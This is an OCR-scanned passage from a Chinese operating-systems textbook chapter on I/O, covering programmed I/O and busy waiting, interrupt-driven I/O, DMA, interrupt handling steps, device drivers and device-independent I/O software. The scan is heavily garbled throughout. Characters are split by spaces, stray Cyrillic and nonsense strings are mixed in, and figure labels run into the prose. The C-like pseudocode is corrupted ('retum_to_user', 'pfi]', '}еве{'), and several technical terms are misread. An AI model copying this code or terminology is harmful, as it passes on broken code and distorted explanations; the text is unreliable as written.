然后 ， 用 户 进程 通过 发 出 系统 调用 打开 打印 机 来 获得 打印 机 以 便 进行 写 操作 。 如 果 打印 机 当前 被 另 
-个 进程 占用 ， 该 系统 调用 将 失败 并 返回 一 个 错误 代码 ， 或 者 将 阻塞 直到 打印 机 可 用 ， 具体 情况 取决 于 
操作 系统 和 调用 参数 。 一 旦 拥有 打印 机 ， 用 户 进程 就 发 出 一 个 系统 调用 通知 操作 系统 在 打印 机 上 打印 字 
TR. 

然后 ， 操 作 系统 (通常 ) 将 字符 串 缓冲 区 复制 到 内 核 空间 中 的 一 个 数组 (如 p) 中 ， 在 这 里 访问 更 
加 容易 〈 因 为 内 核 可 能 必须 修改 内 存 映射 才能 到 达 用 户 空间 ) 。 然后 操作 系统 要 查看 打印 机 当前 是 否 可 
用 。 如 果 不 可 用 ， 就 要 等 待 直 到 它 可 用 。 一 旦 打印 机 可 用 ， 操 作 系统 就 复制 第 一 个 字符 到 打印 机 的 数据 
寄存 器 中 ， 在 这 个 例子 中 使 用 了 内 存 映射 /0O。 这 一 操作 将 滞 活 打印 机 。 字符 也 许 还 不 会 出 现在 打印 机 
上 ， 因 为 某 些 打印 机 在 打印 任何 东西 之 前 要 先 缓冲 一 行 或 一 页 。 然 而 ， 在 图 5-7b 中 ， 我 们 看 到 第 一 个 字 
符 已 经 打印 出 来 ， 并 且 系 统 已 经 将 “B” 标 记 为 下 一 个 待 打印 的 字符 。 
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待 打印 的 


字符 串 
用 户 空间 | 打印 


[| 


内 核 空间 


一 一 一 ， 


И 
图 5-7 打印 一 个 字符 串 的 步骤 


一 旦 将 第 一 个 字符 复制 到 打印 机 ， 操作 系统 就 要 查看 打印 机 是 否 就 绪 准 备 接收 另 一 个 字符 。 一 般 而 
言 , 打印 机 都 有 第 二 个 寄存 器 ， 用 于 表明 其 状态 。 将 字符 写 到 数据 寄存 器 的 操作 将 导致 状态 变 为 非 就 绪 。 
当 打印 机 控制 器 处 理 完 当前 字符 时 ， 它 就 通过 在 其 状态 寄存 器 中 设置 某 一 位 或 者 将 某 个 值 放 到 状态 寄存 
器 中 来 表示 其 可 用 性 。 

这 时 ， 操 作 系统 将 等 待 打 印 机 状态 再 次 变 为 就 绪 。 打 印 机 就 绪 事 件 发 生 时 ， 操作 系统 就 打印 下 一 个 
字符 ， 如 图 5-7c 所 示 。 这 一 循环 继续 进行 ， 直 到 整个 字符 串 打印 完 。 然 后 ， 控制 返回 到 用 户 进程 。 

操作 系统 相继 采取 的 操作 总 结 在 图 5-8 中 。 首 先 ， 数 据 被 复制 到 内 核 空 间 。 然后 ， 操 作 系 统 进入 一 
个 密闭 的 循环 ， 一 次 输出 一 个 字符 。 在 该 图 中 ， 清 楚 地 说 明 了 程序 控制 VO 的 最 根本 的 方面 ， 这 就 是 输 
出 一 个 字符 之 后 ， CPU 要 不 断 地 查询 设备 以 了 解 它 是 否 就 绪 准 备 接收 另 一 个 字符 。 这 一 行为 经 常 称 为 轮 
ih (polling) 或 忙 等 待 (busy waiting), 


-from -user(buffer, p, count); /* p 是 内 核 缓冲 区 */ 
人 н) Г " /* 对 每 个 字符 循环 */ 

while (*printer_status_reg != READY); /* 循环 直到 就 绪 */ 

*printer- data_register = pfi]; 六 输出 一 个 字符 */ 


retum_to_user(); 


图 5-8 使 用 程序 控制 1O 将 一 个 字符 串 写 到 打印 机 


程序 控制 /O 十 分 简单 但 是 有 缺点 ， 即 直到 全 部 LO 完成 之 前 要 占用 CPU 的 全 部 时 间 。 如 果 “ 打 印 ” 
一 个 字符 的 时 间 非 常 短 (因为 打印 机 所 做 的 全 部 事情 就 是 将 新 的 字符 复制 到 一 个 内 部 缓冲 区 中 )， 那 么 
忙 等 待 还 是 不 错 的 。 此 外 ， 在 嵌入 式 系统 中 ，CPU 没 有 其 他 事情 要 做 ， 忙 等 待 也 是 合理 的 。 然 而 ， 在 更 
加 复杂 的 系统 中 ，CPU 有 其 他 工作 要 做 ， 忙 等 待 将 是 低 效 的 ， 需要 更 好 的 IO 方法 。 


5.2.3 中 断 驱动 JO 

现在 我 们 考虑 在 不 缓冲 字符 而 是 在 每 个 字符 到 来 时 便 打印 的 打印 机 上 进行 打印 的 情形 。 如 果 打印 机 
每 秒 可 以 打印 100 个 字符 ， 那 么 打印 每 个 字符 将 花费 10ms。 这 意味 着 ， 当 每 个 字符 写 到 打印 机 的 数据 寄 
存 器 中 之 后 ，CPU 将 有 10ms 搁 置 在 无 价值 的 循环 中 ,等待 允 许 输出 下 一 个 字符 。 这 10ms 时 间 是 以 进行 
一 次 上 下 文 切换 并 且 运 行 其 他 进程 ， 否 则 就 浪费 了 。 

这 种 允许 CPU 在 等 待 打 印 机 变 为 就 绪 的 同时 做 某 些 其 他 事情 的 方式 就 是 使 用 中 断 。 当 打印 字符 囊 的 
系统 调用 被 发 出 时 ， 如 我 们 前 面 所 介绍 的 ， 字 符 串 缓 吕 区 被 复制 到 内 核 空间 ， 并 且 一 旦 打印 机 准备 好 接 
收 一 个 字符 时 就 将 第 一 个 字符 复制 到 打印 机 中 。 这 时 ，CPU 要 调用 调度 程序 ， 并 且 某 个 其 他 进程 将 运行。 
请 求 打印 字符 串 的 进程 将 被 阻塞 ， 直 到 整个 字符 串 打印 完 。 系 统 调用 所 做 的 工作 如 图 5-9a 所 示 。 

当 打印 机 将 字符 打印 完 并 且 准备 好 接收 下 一 个 字符 时 ， 它 将 产生 一 个 中 断 。 这 一 中 断 将 停止 当前 进 
程 并 且 保存 其 状态 。 然 后 ， 打 印 机 中 断 服务 过 程 将 运行 。 图 5-9b 所 示 为 打印 机 中 断 服务 过 程 的 一 个 粗略 
的 版 本 。 如 果 没 有 更 多 的 字符 要 打印 ， 中 上 断 处 理 程序 将 采取 某 个 操作 将 用 户 进程 解除 阻塞。 否则 ， 它 将 
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输出 下 一 个 字符 ， 应 答 中 断 ， 并 且 返 回 到 中 断 之 前 正在 运行 的 进程 ， 该 进程 将 从 其 停止 的 地 方 继续 运行。 


И (count == 0){ 
unblock -user(); 

}еве{ 
*printer_data_register = рі]; 
count = count- 1; 
i=i+1; 

| 

acknowledge_interrupt( ); 


retum_from _interrupt(); 


сору _from_usertbuffer, р, count); 
enable _interrupts(); 

while (*printer status_reg != READY) ; 
*printer -data_register = plol; 
scheduler(); 


a) b) 


图 5-9 使 用 中 断 驱动 1O 将 一 个 字符 串 写 到 打印 机 : а) 当 打印 系统 调用 
被 发 出 时 执行 的 代码 ，b) 打印 机 的 中 断 服务 过 程 


5.2.4 使 用 DMA 的 I/O 

中 断 驱动 IO 的 一 个 明显 缺点 是 中 断 发 生 在 每 个 字符 上 。 中 断 要 花费 时 间 ， 所 以 这 一 方法 将 浪费 -一 
定数 量 的 CPU 时 间 。 这 一 问题 的 一 种 解决 方法 是 使 用 DMA。 此 处 的 思路 是 让 DMA 控 制 器 一 次 给 打印 机 
提供 一 个 字符 , 而 不 必 打扰 CPU。 本 质 上 ， 
DMA 是 程序 控制 /JO， 只 是 由 DMA 控 制 器 
而 不 是 主 CPU 做 全 部 工作 。 这 一 策略 需要 
特殊 的 硬件 DMA 控制 器 )， 但 是 使 CPU a b 
AE DARKER, 图 5-10 РМАТ, а) 当 打印 系统 调用 被 

DMA 的 代码 概要 如 图 5-10 所 示 。 ЫИ е 

MAREMAS ач 发 出 时 执行 的 代码 ，b) 中 断 服务 过 程 
打印 钴 个 字符 一 次 喊 少 到 打印 每 个 缓冲 区 一 次 。 如 果 有 许多 字符 并 且 中 上 断 十 分 级 慢 ， 那 么 采用 DMA 可 
能 是 重要 的 改进 。 另 一 方面 ，DMA 控 制 器 通常 比 主 CPU 要 慢 很 多 。 如 果 DMA 控 制 器 不 能 以 全 束 驱 动 设 
备 ， 或 者 CPU 在 等 待 DMA 中 断 的 同时 没有 其 他 事情 要 做 ， 那 么 采用 中 断 驱 动 O 甚 至 采用 程序 控制 1O 也 
许 更 好 。 


5.3 WO 软件 层次 
IO 软件 通常 组 织 成 四 个 层次 ， 如 图 5-11 所 示 。 每 一 月 具 有 一 个 要 执行 的 定义 明确 的 功能 和 一 个 的 
定义 明确 的 与 邻近 层次 的 接口 。 功 能 与 接 | 


copy_from _user(butfer, p, count); 
set_up_DMA_controller( ); 
scheduler(); 


acknowledge_interrupt( ); 
unblock. user(); 
return_from_interrupt( ); 


口 随 系统 的 不 同 而 不 同 ， 所 以 下 面 的 讨论 | 用 户 级 VO 软 件 
并 不 针对 一 种 特定 的 机 器 。 我 们 将 从 底层 与 设备 无 关 的 操作 系统 软件 
开始 讨论 每 一 层 。 设备 驱动 程序 
5.3.1 中 断 处 理 程序 中 断 处 理 程序 
虽然 程序 控制 IO 偶尔 是 有 益 的 ， 但 是 | 硬件 ] 


对 于 大 多 数 IO 而 言 ， 中 断 是 令 人 不 偷 快 的 


图 5-11 IO 软件 系统 的 层次 


事情 并 且 无 法 避免 。 应 当 将 其 深 深 地 隐藏 
在 操作 系统 内 部 ， 以 便 系 统 的 其 他 部 分 尽量 不 与 它 发 生 联系 。 隐 藏 它们 的 最 好 办 法 是 将 启动 一 个 IO 操 
作 的 驱动 程序 阻塞 起 来 ， 直 到 IO 操作 完成 且 产 生 一 个 中 断 。 驱 动 程序 阻塞 自己 的 手段 有 : 在 一 个 信号 
量 上 执行 down 操 作 、 在 一 个 条 件 变量 上 执行 wait 操 作 、 在 一 个 消息 上 执行 receive 操 作 或 者 某 些 类 似 的 
操作 。 

当中 断 发 生 时 ， 中 断 处 理 程序 将 做 它 必须 要 做 的 全 部 工作 以 便 对 中 断 进 行 处 理 。 然 后 ， 它 可 以 将 启 
动 中 断 的 驱动 程序 解除 阻塞 。 在 一 些 情形 中 ， 它 只 是 在 一 个 信号 量 上 执行 up 操作 ， 其 他 情形 中 ， 是 对 管 
程 中 的 条 件 变量 执行 signal 操 作 ， 还 有 一 些 情形 中 ， 是 向 被 阻塞 的 驱动 程序 发 一 个 消息 。 在 所 有 这 些 情 
形 中 ， 中 断 最 终 的 结果 是 使 先前 被 阻塞 的 驱动 程序 现在 能 够 继续 运行 。 如 果 驱 动 程序 构造 为 内 核 进程， 
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具有 它们 自己 的 状态 、 堆 栈 和 程序 计数 器 ， 那 么 这 一 模型 运转 得 最 好 。 

当然 ， 现 实 没 有 如 此 简单 。 对 一 个 中 断 进行 处 理 并 不 只 是 简单 地 捕获 中 断 ， 在 某 个 信号 量 上 执行 
up 操作 ， 然 后 执行 一 条 IRET 指 令 从 中 断 返 回 到 先前 的 进程 。 对 操作 系统 而 言 ， 还 涉及 更 多 的 工作 。 我 
们 将 按 一 系列 步骤 给 出 这 一 工作 的 轮廓 ， 这 些 步 又 是 硬件 中 断 完成 之 后 必须 在 软件 中 执行 的 。 应 该 注意 
的 是 ， 细 节 是 非常 依赖 于 系统 的 ， 所 以 下 面 列 出 的 某 些 步骤 在 一 个 特定 的 机 器 上 可 能 是 不 必要 的 ， 而 没 
有 列 出 的 步 又 可 能 是 必需 的 。 此 外 ， 确 实 发 生 的 步骤 在 某 些 机 器 上 也 可 能 有 不 同 的 顺序 。 

1) 保存 没有 被 中 断 硬件 保存 的 所 有 寄存 器 (包括 PSW)。 

2) 为 中 断 服务 过 程 设置 上 下 文 ， 可 能 包括 设置 TLB、MMU 和 页 表 。 

3) 为 中 断 服务 过 程 设置 堆栈 。 

4) 应 答 中 断 控制 器 ， 如 果 不 存在 集中 的 中 断 控制 器 ， 则 再 次 开放 中 断 。 

5) 将 寄存 器 从 它们 被 保存 的 地 方 〈 可 能 是 某 个 堆栈 ) 复制 到 进程 表 中 。 

6) 运行 中 断 服务 过 程 ， 从 发 出 中 断 的 设备 控制 器 的 寄存 器 中 提取 信息 。 

7) 选择 下 一 次 运行 哪个 进程 ， 如 果 中 断 导 致 某 个 被 阻塞 的 高 优先 级 进程 变 为 就 结 ， 则 可 能 选择 它 现 
在 就 运行 。 

8) 为 下 一 次 要 运行 的 进程 设置 MMU 上下文 ， 也 许 还 需要 设置 某 个 TLB。 

9) 装 入 新 进程 的 寄存 器 ， 包 括 其 PSW。 

10) 开始 运行 新 进程 。 

由 此 可 见 ， 中 断 处 理 远 不 是 无 足 轻重 的 小 事 。 它 要 花费 相当 多 的 CPU 指令 ， 特 别 是 在 存在 虚拟 内 存 
并 且 必 须 设置 页 表 或 者 必须 保存 MMU 状 态 〈 例 如 R 和 M 位 ) 的 机 器 上 。 在 某 些 机 器 上 ， 当 在 用 户 态 与 核 
心态 之 间 切 换 时 ， 可 能 还 需要 管理 TLB 和 CPU 高 速 缓存， 这 就 要 花费 额外 的 机 器 周期 。 


5.3.2 设备 驱动 程序 

在 本 章 前 面 的 内 容 中 ， 我 们 介绍 了 设备 控制 器 所 做 的 工作 。 我 们 注意 到 每 一 个 控制 器 都 设 有 某 些 设 
备 寄存 器 用 来 向 设备 发 出 命令 ， 或 者 设 有 某 些 设备 寄存 器 用 来 读 出 设备 的 状态 ， 或 者 设 有 这 两 种 设备 寄 
存 器 。 设 备 寄存 器 的 数量 和 命令 的 性 质 在 不 同 设备 之 间 有 着 根本 性 的 不 同 。 例 如 ， 和 鼠标 蝶 动 程序 必须 从 
鼠标 接收 信息 ， 以 识别 鼠标 移动 了 多 远 的 距离 以 及 当前 哪 一 个 键 被 按 下 。 相 反 ， 磁 盘 驱 动 程序 可 能 必须 
要 了 解 扁 区 、 磁 道 、 柱 面 、 磁 头 、 磁 盘 咎 移动 、 电 机 了 驱动器、 磁头 定位 时 间 以 及 所 有 其 他 保证 磁盘 正常 
工作 的 机 制 。 显 然 ， 这 些 驱动 程序 是 有 很 大 区 别 的 。 
， 每 个 连接 到 计算 机 上 的 IO 设备 都 需要 某 些 设备 特定 的 代码 来 对 其 进行 控制 。 这 样 的 代码 称 
为 设备 驱动 程序 (device driver) ， 它 一 般 由 设备 的 制造 商 编写 并 随同 设备 一 起 交付 。 因 为 每 一 个 操作 系 
统 都 需要 自己 的 驱动 程序 ， 所 以 设备 制造 商 通常 要 为 若干 流行 的 操作 系统 提供 驱动 程序 。 

每 个 设备 驱动 程序 通常 处 理 一 种 类 型 的 设备 ， 或 者 至 多 处 理 一 类 紧密 相关 的 设备 。 例 如 ，SCSI 磁 
盘 驱 动 程序 通常 可 以 处 理 不 同 大 小 和 不 同 速度 的 多 个 SCSI 磁 盘 ， 或 许 还 可 以 处 理 SCSI CD-ROM。 而 另 
一 方面 ， 和 鼠标 和 游戏 操纵 杆 是 如 此 的 不 同 ， 以 至 于 它们 通常 需要 不 同 的 坚 动 程序 。 然 而 ， 对 于 一 个 设备 
驱动 程序 控制 多 个 不 相关 的 设备 并 不 存在 技术 上 的 限制 ， 只 是 这 样 做 并 不 是 一 个 好 主意 。 

为 了 访问 设备 的 硬件 (意味 着 访问 设备 控制 器 的 寄存 器 ) ， 设 备 驱动 程序 通常 必须 是 操作 系统 内 核 
的 一 部 分 ， 至 少 对 目前 的 体系 结构 是 如 此 。 实 际 上 ， 有 可 能 构造 运行 在 用 户 空间 的 驱动 程序 ， 使 用 系统 
调用 来 读 写 设备 寄存 器 。 这 一 设计 使 内 核 与 驱动 程序 相隔 离 ， 并 且 使 驱动 程序 之 间 相 互 隔离 ， 这 样 做 可 
以 消除 系统 崩溃 的 一 个 主要 源头 一 一 有 问题 的 驱动 程序 以 这 样 或 那样 的 方式 干扰 内 核 。 对 于 建立 高 度 可 


靠 的 系统 而 言 ， 这 绝对 是 正确 的 方向 。MINIX 3 就 是 一 个 这 样 的 系统 ， 其 中 设备 驱动 程序 就 作为 用 户 进 
程 而 运行 。 然 而 ， 因 为 大 多 数 其 他 桌面 操作 系统 要 求 驱动 程序 运行 在 内 核 中 ， 所 以 我 们 在 这 里 只 考虑 这 
样 的 模型 。 


因为 操作 系统 的 设计 者 知道 由 外 人 编写 的 驱动 程序 代码 片断 将 被 安装 在 操作 系统 的 内 部 ， 所 以 
需要 有 一 个 体系 结构 来 允许 这 样 的 安装 。 这 意味 着 要 有 一 个 定义 明确 的 模型 ， 规 定 驱动 程序 做 什么 事 
情 以 及 如 何 与 操作 系统 的 其 余部 分 相互 作用 。 设 备 驱动 程序 通常 位 于 操作 系统 其 余部 分 的 下 面 ， 如 图 
5-12 所 示 。 
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操作 系统 通常 将 驱动 程序 归 类 于 少数 的 类 别 之 一 。 最 为 通用 的 类 别 是 块 设备 (block device) 和 字 
ité (character device)。 块 设备 ( 例 
如 磁盘 ) 包含 多 个 可 以 独立 寻 址 的 数据 块 ， 
字符 设备 (例如 键盘 和 打印 机 ) 则 生成 或 
接收 字符 流 。 

大 多 数 操作 系统 都 定义 了 一 个 所 有 “用户 
块 设备 都 必须 支持 的 标准 接口 ， 并 且 还 定 ”空间 
义 了 另 一 个 所 有 字符 设备 都 必须 支持 的 标 
准 接口 。 这 些 接口 由 许多 过 程 组 成 ， 操 作 | 
系统 的 其 余部 分 可 以 调用 它们 让 驱动 程序 


用 户 进程 


工作 。 典 型 的 过 程 是 那些 读 一 个 数据 块 操作 系统 的 其 余部 分 
(对 块 设备 而 言 ) 或 者 写 一 个 字符 串 (对 Ж 
字符 设备 而 言 ) 的 过 程 。 空间 | | es І =, ша 
ходна трн яа ЕНН. -RC 
кита 1- тїї] | “ЕШР || оюу 


进 制 程序 ， 包 含 需要 编译 到 其 内 部 的 所 有 
驱动 程序 。 这 一 方案 多 年 以 来 对 UNIX 系 
统 而 言 是 标准 规范 ， 因 为 UNIX 系 统 主要 
由 计算 中 心 运行 ，UO 设 备 几乎 不 发 生变 Я 
= 
е < 


硬件 。 “打印 机 控制 器 ] CD-ROM 控 制 器 


化 。 如 果 添 加 了 一 个 新 设备 ， 系 统管 理 员 y 


只 需 重新 编 详 内 核 ， 将 新 的 驱动 程序 增加 Wt 、 
到 新 的 二 进 制程 序 中 。 | І 

随 着 个 人 计算 机 的 出 现 ， 这 一 模型 图 5-12 设备 驱动 程序 的 逻辑 定位 。 实 际 上 ， 驱 动 程序 
不 再 起 作用 ， 因 为 个 人 计算 机 有 太 多 种 类 和 设备 控制 器 之 间 的 所 有 通信 都 通 过 总 线 


的 UO 设 备 。 即 便 拥 有 源 代码 或 目标 模块 ， 
也 只 有 很 少 的 用 户 有 能 力 重新 编译 和 重新 连接 内 核 ， 何况 他 们 并 不 总 是 拥有 源 代 码 或 目标 模块 。 为 此 ， 
从 MS-DOS 开 始 ， 操 作 系统 转向 驱动 程序 在 执行 期 间 动 态 地 装载 到 系统 中 的 另 一 个 模型 。 不 同 的 操作 系 
统 以 不 同 的 方式 处 理 驱 动 程序 的 装载 工作 。 

设备 驱动 程序 具有 若干 功能 。 最 明显 的 功能 是 接收 来 自 其 上 方 与 设备 无 关 的 软件 所 发 出 的 抽象 的 读 
写 请 求 ， 并 且 目睹 这 些 请 求 被 执行 。 除 此 之 外 ， 还 有 -- 些 其 他 的 功能 必须 执行 。 例 如 ， 如 果 需 要 的 话 ， 
坚 动 程序 必须 对 设备 进行 初始 化 。 它 可 能 还 需要 对 电源 需求 和 日 志 事 件 进行 管理 。 

许多 设备 驱动 程序 具有 相似 的 一 般 结构 。 趴 型 的 驱动 程序 在 启动 时 要 检查 输入 参数 ， 检查 输入 参数 
的 目的 是 搞 清 它们 是 否 是 有 效 的 ， 如 果 不 是 ， 则 返回 一 个 错误 。 如 果 输 入 参数 是 有 效 的 ， 则 可 能 需要 进 
行 从 抽象 事项 到 具体 事项 的 转换 。 对 磁盘 驱动 程序 来 说 ， 这 可 能 意味 着 将 一 个 线性 的 磁盘 块 号 转换 成 磁 
盘 几 何 布局 的 磁头 、 磁 道 、 扇 区 和 柱 面 号 。 

接着 ， 驱 动 程序 可 能 要 检查 设备 当前 是 否 在 使 用 。 如 果 在 使 用 ， 请 求 将 被 排 人 队列 以 备 稍 后 处 理 。 
如 果 设备 是 空闲 的 ， 驱 动 程序 将 检查 硬件 状态 以 了 解 请 求 现在 是 否 能 够 得 到 处 理 。 在 传输 能 够 开始 之 前 ， 
可 能 需要 接 通 设 备 或 者 启动 马达 。 一 旦 设备 接 通 并 就 结 ， 实 际 的 控制 就 可 以 开始 了 。 

控制 设备 意味 着 向 设备 发 出 一 系列 命令 。 依 据 控制 设备 必须 要 做 的 工作 ， 驱动 程序 处 在 确定 命令 序 
列 的 地 方 。 驱 动 程序 在 获知 哪些 命令 将 要 发 出 之 后 ， 它 就 开始 将 它们 写 人 控制 器 的 设备 寄存 器 。 驱 动 程 
序 在 把 每 个 命令 写 到 控制 器 之 后 ， 它 可 能 必须 进行 检测 以 了 解 控制 器 是 否 已 经 接收 命令 并 且 准 备 好 接收 
下 一 个 命令 。 这 一 序列 继续 进行 ， 直 到 所 有 命令 被 发 出 。 对 于 某 些 控制 器 ， 可 以 为 其 提供 一 个 在 内 存 中 
的 命令 链表 ， 并 且 告诉 它 自 己 去 读 取 并 处 理 所 有 命令 而 不 需要 操作 系统 提供 进一步 帮助 。 

命令 发 出 之 后 ， 会 牵涉 两 种 情形 之 一 。 在 多 数 情况 下 ， 设 备 驱 动 程序 必须 等 待 ， 直到 控制 器 为 其 做 
某 些 事情 ， 所 以 驱动 程序 将 阻塞 其 自身 直到 中 断 到 来 解除 阻塞 。 然 而 ， 在 另外 一 些 情况 下 ， 操 作 可 以 无 
延迟 地 完成 ， 所 以 驱动 程序 不 需要 阻塞 。 在 字符 模式 下 滚动 屏幕 只 需要 写 少许 字 节 到 控制 器 的 寄存 器 中 ， 
由 于 不 需要 机 械 运动 ， 所 以 整个 操作 可 以 在 几 纳 秒 内 完成 ， 这 便 是 后 一 种 情形 的 例子 。 
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在 前 一 种 情况 下 ， 阻 塞 的 驱动 程序 可 以 被 中 断 唤 醒 。 在 后 一 种 情况 下 ， 驱 动 程序 根本 就 不 会 休眠 。 
无 论 是 哪 一 种 情况 ， 操 作 完成 之 后 驱动 程序 都 必须 检查 错误 。 如 果 一 切 顺 利 ， 驱 动 程序 可 能 要 将 数据 
(例如 刚刚 读 出 的 一 个 磁盘 块 ) 传送 给 与 设备 无 关 的 软件 。 最 后 ， 它 向 调用 者 返回 一 些 用 于 错误 报告 的 
状态 信息 。 如 果 还 有 其 他 未 完成 的 请 求 在 排队 ， 则 选择 一 个 启动 执行 。 如 果 队 列 中 没有 未 完成 的 请 求 ， 
则 该 驱动 程序 将 阻塞 以 等 待 下 一 个 请 求 。 

这 一 简单 的 模型 只 是 现实 的 粗略 近似 ， 许 多 因素 使 相关 的 代码 比 这 要 复杂 得 多 。 首 先 ， 当 一 个 驱动 
程序 正在 运行 时 ， 某 个 MO 设备 可 能 会 完成 操作 ， 这 样 就 会 中 断 驱动 程序 。 中 断 可 能 会 导致 一 个 设备 驱 
动 程序 运行 ， 事 实 上 ， 它 可 能 导致 当前 驱动 程序 运行 。 例 如 ， 当 网 络 驱动 程序 正在 处 理 一 个 到 来 的 数据 
包 时 ， 另 一 个 数据 包 可 能 到 来 。 因 此 ， 驱 动 程序 必须 是 重 入 的 (reentrant) ， 这 意味 着 一 个 正在 运行 的 驱 
动 程序 必须 预料 到 在 第 一 次 调用 完成 之 前 第 二 次 被 调用 。 

在 一 个 热 可 播 找 的 系统 中 ， 设 备 可 以 在 计算 机 运行 时 添加 或 删除 。 因 此 ， 当 一 个 驱动 程序 正 忙于 从 
某 设备 读数 据 时 ， 系 统 可 能 会 通知 它 用 户 突然 将 设备 从 系统 中 删除 了 。 在 这 样 的 情况 下 ， 不 但 当前 IO 
传送 必须 中 止 并 且 不 能 破坏 任何 核心 数据 结构 ， 而 且 任何 对 这 个 现 已 消失 的 设备 的 悬而未决 的 请 求 都 必 
须 适 当地 从 系统 中 删除 ， 同 时 还 要 为 它们 的 调用 者 提供 这 一 坏 消息 。 此 外 ， 未 预料 到 的 新 设备 的 添加 可 
能 导致 内 核 重新 配置 资源 〈 例 如 中 断 请 求 线 )， 从 驱动 程序 中 撤除 旧 资源 ， 并 且 在 适当 位 置 填 人 新 资源 。 

驱动 程序 不 允许 进行 系统 调用 ， 但 是 它们 经 常 需要 与 内 核 的 其 余部 分 进行 交互 。 对 某 些 内 核 过 程 的 
调用 通常 是 允许 的 。 例 如 ， 通 常 需要 调用 内 核 过 程 来 分 配 和 释放 硬 接线 的 内 存 页 面 作为 缓冲 区 。 还 可 能 
需要 其 他 有 用 的 调用 来 管理 MMU、 定 时 器 、DMA 控 制 器 、 中 断 控制 器 等 。 


5.3.3 与 设备 无 关 的 VO 软件 

虽然 软件 中 有 一 些 是 设备 特定 的 ， 但 是 其 他 部 分 1 软件 是 与 设备 无 关 的 。 设 备 驱动 程序 和 与 设 
备 无 关 的 软件 之 间 的 确切 界限 依赖 于 具体 系统 (和 设备 )， гос ыссы 
因为 对 于 一 些 本 来 应 按照 与 设备 无 关 方式 实现 的 功能 ， 出 。 上 设备 并 动 笃 的 统一 接口。 
于 效率 和 其 他 原因 ， 实 际 上 是 由 驱动 程序 来 实现 的 ， 图 
5-13 所 示 的 功能 典型 地 由 与 设备 无 关 的 软件 实现 

与 设备 无 关 的 软件 的 基本 功能 是 执行 对 所 有 设备 公共 
) J} , Гај "в. 一 个 统一 的 41. i TSRS a AOT N a n AN S 
рне TERRE: ти 图 5-13 ”与 设备 无 关 的 IO 软件 的 功能 

1. 设备 驱动 程序 的 统一 接口 

操作 系统 的 一 个 主要 问题 是 如 何 使 所 有 1O 设 备 和 驱动 程序 看 起 来 或 多 或 少 是 相同 的 。 如 果 磁盘 
打印 机 、 刍 盘 等 接口 方式 都 不 相同 ， 那 么 每 次 在 一 个 新 设备 出 现时 ， 都 必须 为 新 设备 修改 操作 系统 。 必 
须 为 每 个 新 设备 修改 操作 系统 决 不 是 一 个 好 主意 . 

设备 驱动 程序 与 操作 系统 其 余部 分 之 间 的 接口 是 这 一 问题 的 一 个 方面 。 图 5-144 所 示 为 这 样 一 种 情 
形 :每 个 设备 驱动 程序 有 不 同 的 与 操作 系统 的 接口 。 这 意味 着 ， 可 供 系统 调用 的 驱动 程序 函数 随 红 动 各 
序 的 不 同 而 不 同 。 这 可 能 还 意味 着 ， 坚 动 程序 所 需要 的 内 核 卫 数 也 是 随 驱动 程序 的 不 同 而 不 同 的 。 综 合 
起 来 看 ， 这 意味 着 为 每 个 新 的 驱动 程序 提供 接口 都 需要 大 量 全 新 的 编程 工作 。 


SATAR IDEÍ SCSI SATAMA IDE 磁 盘 。 SCSI 磁盘 
驱动 程序 “驱动 程序 ”驱动 程序 驱动 程序 “驱动 程序 ”驱动 程序 
a) b) 


图 5-14 а) 没有 标准 的 驱动 程序 接口 ，b) RARER REO 
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相反 ， 图 5-14b 所 示 为 一 种 不 同 的 设计 ， 在 这 种 设计 中 所 有 驱动 程序 具有 相同 的 接口 。 这 样 -来 ， 
倘若 符合 驱动 程序 接口 ， 那 么 添加 一 个 新 的 驱动 程序 就 变 得 容易 多 了 。 这 还 意味 着 驱动 程序 的 编写 人 员 
知道 驱动 程序 的 接口 应 该 是 什么 样子 的 。 实 际 上 ， 虽 然 并 非 所 有 的 设备 都 是 绝对 一 样 的 ， 但 是 通常 只 存 
在 少数 设备 类 型 ， 而 它们 的 确 大 体 上 是 相同 的 。 

这 种 设计 的 工作 方式 如 下 。 对 于 每 一 种 设备 类 型 ， 例 如 磁盘 或 打印 机 ， 操作 系统 定义 一 组 驱动 程序 
必须 支持 的 函数 。 对 于 磁盘 而 言 ， 这 些 函数 自然 地 包含 读 和 写 ， 除 此 之 外 还 包含 开启 和 关闭 电源 、 格 式 
化 以 及 其 他 与 磁盘 有 关 的 事情 。 驱 动 程序 通常 包含 一 张 表格 ， 这 张 表格 具有 针对 这 些 函 数 指向 驱动 程序 
自身 的 指针 。 当 驱动 程序 装载 时 ， 操 作 系 统 记录 下 这 张 函数 指针 表 的 地 址 ， 所 以 当 操作 系统 需要 调用 一 
个 函数 时 ， 它 可 以 通过 这 张 表格 发 出 间接 调用 。 这 张 函 数 指针 表 定 义 了 驱动 程序 与 操作 系统 其 余部 分 之 
间 的 接口 。 给 定 类 型 (磁盘 、 打 印 机 等 ) 的 所 有 设备 都 必须 服从 这 一 要 求 。 

如 何 给 IO 设备 命名 是 统一 接口 问题 的 另 一 个 方面 。 与 设备 无 关 的 软件 要 负责 把 符号 化 的 设备 名 映 
射 到 适当 的 驱动 程序 上 。 例 如 ， 在 UNIX 系 统 中 ， 像 /dev/disk0 这 样 的 设备 名 惟一 确定 了 一 个 特殊 文件 的 i 
节点 ， 这 个 i 节 点 包含 了 主 设备 号 (major device number), 主 设备 号 用 于 定位 相应 的 驱动 程序 。i 节 点 还 
包含 次 设备 号 (minor device number), 次 设备 号 作为 参数 传递 给 驱动 程序 ， 用 来 确定 要 读 或 写 的 具体 
单元 。 所 有 设备 都 具有 主 设备 号 和 次 设备 号 ， 并 且 所 有 驱动 程序 都 是 通过 使 用 主 设备 号 来 选择 驱动 程序 
而 得 到 访问 。 

与 设备 命名 密切 相关 的 是 设备 保护 。 系统 如 何 防止 无 权 访问 设备 的 用 户 访问 设备 昵 ? 在 UNIX 和 
Windows 中 ， 设 备 是 作为 命名 对 象 出 现在 文件 系统 中 的 ， 这 意味 着 针对 文件 的 常规 的 保护 规则 也 适用 于 
IO 设备 。 系 统管 理 员 可 以 为 每 一 个 设备 设置 适当 的 访问 权限 。 

2. t 

无 论 对 于 块 设备 还 是 对 于 字符 设备 ， 由 于 种 种 原因 ， 缓冲 也 是 一 个 重要 的 问题 。 作 为 例子 ， 我 们 考 
虚 一 个 想 要 从 调制 解 调 器 读 人 数据 的 进程 。 让 用 户 进程 执行 read 系 统 调用 并 阻塞 自己 以 等 待 字符 的 到 来 ， 
这 是 对 到 来 的 字符 进行 处 理 的 一 种 可 能 的 策略 。 每 个 字符 的 到 来 都 将 引起 中 断 ， 中 断 服务 过 程 负 责 将 字 
